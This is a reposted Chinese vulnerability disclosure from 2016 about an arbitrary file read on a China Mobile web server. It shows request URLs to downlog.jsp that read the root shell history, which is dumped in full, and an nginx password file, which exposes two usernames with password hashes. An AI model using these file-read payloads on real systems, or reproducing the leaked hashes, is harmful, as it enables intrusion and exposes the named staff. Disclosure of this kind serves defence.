神刀安全网

漏洞标题: 中国移动某站任意文件读取

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

中国移动某站任意文件读取

详细说明:

root权限,可以读取历史命令

http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history

cd

cd

ls

cd /

find ./ -name 'nginx*'

cd ./usr/local/nginx

ls

cd sbin

ls

./nginx -v

ps -ef|grep nginx

cd ..

ls

cd conf

ls

cat nginx.conf

vi nginx.conf

ls

cd ..

ls

cd sbin

ls

./nginx

ifconfig -a

ls

cd ..

ls

cd conf

ls

vi nginx.conf

ls

ps -ef|grep nginx

cd ..

ls

cd bin

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

ps -ef|grep nginx

./nginx -s stop

ps -ef|grep nginx

./nginx

ps -ef|grep nginx

ifconfig -a

ls

export TMOUT=0

ls

cd /

find ./ -name 'nginx'

cd usr

cd local

cd nginx

ls

cd conf

ls -ltr |wc -l

ls

ls -ltr

cat nginx.conf.default

ls

pwd

ifconfig -a

cd ..

ls

cd html

ls

cd ..

ls

pwd

cd html

ls

cd ..

ls

find ./ -name 'emapdomains*'

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd proxy_temp

ls

cat 1

cd 1

ls

file 00

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd ..

ls

cd on

ls

cd conf

ls

ls -ltr

cat mime.types

ls -ltr|wc -l

ls -ltr

cd

cd etc

cd /etc

ls

cat hosts

cat resolv.conf

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx.conf

cat upstream.conf

cat nginx.conf

ls

more proxy.conf

ls -ltr

cat proxy.conf

ls -ltr

cat upstream.conf

cd

ls

cd /

find ./ -name '*emapdomains*'

ls

cd /usr/local

ls

cd nginx

ls

cd conf

ls

grep emapdomains *

ls

cd ..

ls

cd logs

ls

pwd

cd ..

ls

cd conf

ls

ls

pwd

ifconfig -a

ls

cd ..

ls

tar cvf ../nginx_conf_byld_20160113.tar conf

ls

cd ..

ls

ls

export TMOUT=0

ls

ps -ef|grep nginx

cd /

find ./ -name

find ./ -name 'nginx*'

pwd

find ./ -name '**.**.**.**'

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx-conf

ifconfig -a

ls -ltr

cd key

ls

cd ..

ls

cat ngx_passwd

pwd

cd /usr

ls

cd local

ls

cd bushu

cd nginx

ls

cd

cd /

ls

find ./ -name 'configure'

more ./home/Nginx/pcre-8.35/configure

!

ls

ls

ls

cd

ls

cd ..

ls

cd /usr

ls

cd local

ls

cd sbin

ls

cd ..

ls

cd nginx

ls

cd conf

ls

cd ..

ls

cd logs

ls

ls -ltr

cd data

ls

cat *

cd

ls

ls

cd /usr

cd local

ls

cd nginx

ls

cd conf

ls

cat upstaream.conf

more upstream.conf

ls

more nginx.conf

ls

more upstream.conf

cd ..

ls

cd sbin

ls

./nginx

ps -ef|grep nginx

export TMOUT=0

cd /usr/local/nginx

cd /etc/init.d

ls

cd ..

vi hosts

cd /usr/local/nginx

ls

cd conf/

ls

cat upstream.conf

cd /etc/init.x

cd /etc/init.d

vi nginx

ps -ef | grep ngixn

ps -ef | grep nginx

cd /usr/local

ls

cd nginx

ls

cd conf

ls

ls -ltr

more nginx.conf

vi nginx.conf

ifconfig

exit

cd /usr/local

ls

cd nginx

ls

pwd

cd html

ls

ls -ltr

cd ../conf

ls

vi nginx.conf

ifconfig

cd /usr/local

ls

cd nginx

ls

ls -ltr

cd conf

ls

vi nginx.conf

ls

cd /usr

cd local

ls

cd nginx

ls

ps -ef|grep nginx

cd logs

ls -ltr

tail -f access-bassapp.log

ls -ltr

grep mbomc access-bassapp.log

grep mbomc access.log

cd ..

ls

cd conf

ls

vi nginx.conf

;s

ls

cd /usr

cd local

ls

cd nginx

ls

cd logs

ls -ltr

tail -f access.log

ls -ltr

tail -10000f access-mbomc.log

cd /usr

cd local

cd nginx

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

cd /

find ./ -name 'Squid'

find ./ -name Squid

find ./ -name squid

ps -ef|grep squid

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

vi nginx.conf

ls

cd ..

ls

ls

export TMOUT=0

ls

cd conf

ls

ls -ltr

exit

ls

ls -ltr

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

ls

cd ../sbin

ls

./nginx -s stop

vi /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

cd conf

ls

vi upstream.conf

pwd

ifconfig -a

pwd

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

ls

cd ..

ls

cd conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

cd ../conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

pwd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

cd /usr/local

cd nginx

cd conf

vi nginx.conf

cd ../sbin

./nginx -s reload

ps -ef|grep nginx

cd /usr/local/nginx

cd conf/

vi nginx.conf

vi nginx.conf

cd ../sbin/

ls

./nginx -s reload

vi ../conf/nginx.conf

./nginx -s reload

cd ../conf/

ls

vi upstream.conf

vi ../conf/nginx.conf

cd ../sbin/

./nginx -s reload

exit

ipconfig -a

ipfongi

ipconfig

ifconfig

uname -a

top

ifconfig

ls

uname -a

ps

ssh root@**.**.**.**

ls -ltr

ls -ltr /usr/local/nginx/sbin/nginx*

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx.conf

ps -ef|grep nginx

cd

ls

cd ..

ls

cd /home

ls

cd live800

ls

cat startLive800Server.sh

./startLive800Server.sh

ps -ef|grep tomcat

ifconfig

ifconfig |more

netstat -rn

ping **.**.**.**

ssh **.**.**.**

who

ls

cd /

find ./ -name squid

cd ./etc/squid

ls

pwd

cd ./usr/sbin/

cd /

cd ./usr/sbin/

ls

./usr/sbin/squid -s

cd /

/usr/sbin/squid -s

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

exit

cd /

find ./ -name 'squid'

/usr/sbin/squid -s

ps -ef|grep squid

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

more nginx.conf

exit

cd /usr/local/nginx

ls

cd conf/

vi nginx.conf

cd ../sbin

./nginx -s reload

cd ..logs

cd ../logs

ls

tail -f access.log

cd ..

cd conf/

ls

vi upstream.conf

cd ../sbin/

./nginx -s reload

exit

ls

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

cd

ls

ls

ps -ef|grep nginx

/usr/local/nginx/sbin/nginx -s reload

ps -ef|grep nginx

exit

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

cd ..

ls

cd logs

ls

ls -ltr

tail -f access.log

ping **.**.**.**

tail -f access-mbomc.log

ping **.**.**.**

ping **.**.**.**

ls

export TMOUT=0

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

ls -ltr

cd ..

ls

cd logs

ls

ls -ltr

tail -1000f access-mbomc.log

LS

ls

ls -ltr

tail -f access-mbomc.log

ls

ls -ltr

tail -f access-mbomc.log

ls -ltr

ipconfig -a

ifconfig -a

ssh root@**.**.**.**

ssh root@**.**.**.**

cd

ls

cd /usr/local/nginx

ls

cd conf

ls

more nginx.conf

ls

ifconfig -a

uname -a

ls

pwd

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

ls

cd /

find ./ -name 'live800'

cd ./home/live800

ls

cd ./home/live800/working/tomcat/live800

ls

cd working

ls

cd tomcat

ls

cd ..

ls

cd ..

ls

more startLive800Server.sh

cd ../tomcat/

ls

cd working

ls

cd tomcat

ls

ls -ltr

cd webapps

ls

cd live800

ls

pwd

cd /home/live800/working/tomcat/webapps/live800

cd live800

]

ifconfig -a

uname

cd /home

ls

cd /live800

cd live800

ls

startLive800Server.sh

sh startLive800Server.sh

ps -ef|grep live800

ps -ef|grep nginx

cd /usr/local

ls

ls

cd /usr/local

ls

cd gninx

cd nginx

ls

cd sbin

ls

pwd

export TMOUT=0

cd ..

ls

cd conf

ls

pwd

cd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

ls

cd /home

cd live800

ls

ls -ltr

cd working

ls

ftp **.**.**.**

cd /home

cd live800

ls

cd /work

cd /working

ls

cd working

ls

cd tomcat

ls

cd live800

ls

cd chatClient

ls

cd chinamobile

ls

cd scripts

ls -F

cd chatbox.js

ls

ls -F

ls -l

cd

ls

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

cd tomcat

ls

cd ..

ls

cd tomcat

ls

cd webapps

ls

ls -ltr

cd live800

ls

ls -ltr zxkf_index.jsp

ls -ltr *index.jsp*

more index.jsp

more showAccount.jsp

more showAccount.jsp

ls -ltr chatbox.jsp

ls

cd chatClient

ls

more chatbox.htm

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

more nginx.conf

ls

ls -ltr

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

cd ..

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

exit

ps -ef | grep ngix

ps -ef | grep ng

ps -ef|grep nginx

cat /usr/local/nginx/conf/nginx.conf

env

ls

find . -name | grep 'index2'

find . -name *.* | grep 'index2'

find . -name 'index2'

find . -name 'index2'pwd

cd ..

ls

find . -name 'index2'

find . -name 'index2.jsp'

cat ./sys/devices/system/cpu/cpu15/cache/index2

cd ./sys/devices/system/cpu/cpu15/cache/index2

ls

cd ..

ls

cd

cd ..

ls

find . -name 'index2.jsp'

cd /home

cd /live800

ls

cd live800

ls

cd working

ls -l

cd tomcat

ls -l

cd webapps

ls

cd live800

ls -l

ls

ls

ls

cd /home

ls

cd live800

ls

cd working

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

./nginx -s reload

export TMOUT=0

./nginx -s reload

ls

cd ..

ls

cd conf

ls

vi nginx.conf

cd ..

ls

cd sbin

./nginx -s reload

cd ..

cd conf

ls

vi nginx.conf

ls

cd /dev

ls

cd shm

ls

cdls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

vi proxy.conf

ls

cd cache

cd /cache

ls

cd proxy_temp_path

ls

ls -ltr

pwd

ls -ltr

rm *

ls

cd ..

ls

cd proxy_cache_path

ls

du -sm *

cd 0

ls

cd 00

ls

ifconfig

exit

ls

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

ls

./nginx -s reload

ls

ps -ef|grep nginx

pwd

cd ..

ls

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd html

ls

cd images

ls

cd ..

ls

cd ..

ls

cd on

cd proxy_temp

ls

file 1

cd 1

ls

file *

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd

export TMOUT=0

ssh **.**.**.**

ls

ps -ef | grep nginx

cat /usr/local/nginx/conf/nginx.conf

ls

pwd

ls -A

cd /home

ls

cd /live800

find ./ 'live800'

e ff

ls

sd ..

cd ..

pwd

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

find ./'zxkf_index.jsp'

exit

ls

cd /home/live800/working/tomcat/webapps/live800

ls

cd /home/live800/working/tomcat/webapps/live800

ls

find .-name zxkf_index.jsp

cd ..

ls

cd ..

cd ..

ls

pwd

cd ..

cd ..

ls

pwd

cd .

ls

cd ..

find .-name zxkf_index.jsp

cd /home/live800/working/tomcat

ls

cd /restartTomcat.sh

exit

ls

pwd

/home/live800/working/

cd /home

ls

cd /live800

/home/live800/working/tomcat/webapps/live800

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep live800

ls

cd /home/live800

ls

cd /working

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep "live800"

ls

pwd

ps -ef|grep live800

ls

pwd

ls -f

find -name/ live800

find

ls

pwd

cd /home

ls

cd /weblogic

pwd

ps -ef| grep live800

ls -A

ls -a

ls

cd /home/live800/working/tomcat/restartTomcat.sh

cd /home/live800/working/tomcat/

ls

ls -a

pwd

find /-name live800

ls

cd /live800

find /-name "zxkf_index.jsp"

pwd

cd..

cd ..

cd

pwd

history 20

history 50

exit

ls

history 50

ls

pwd

ls -A

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

cd /SDSSO

ls

ls

ls -a

看到个http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd

zhangyong:2RsUTTsvOmOdA

zengqh:DunTiVFkBxz7A

应该该是nginx的登录密码

漏洞证明:

修复方案:

升级

版权声明:转载请注明来源 小川@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国移动某站任意文件读取

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址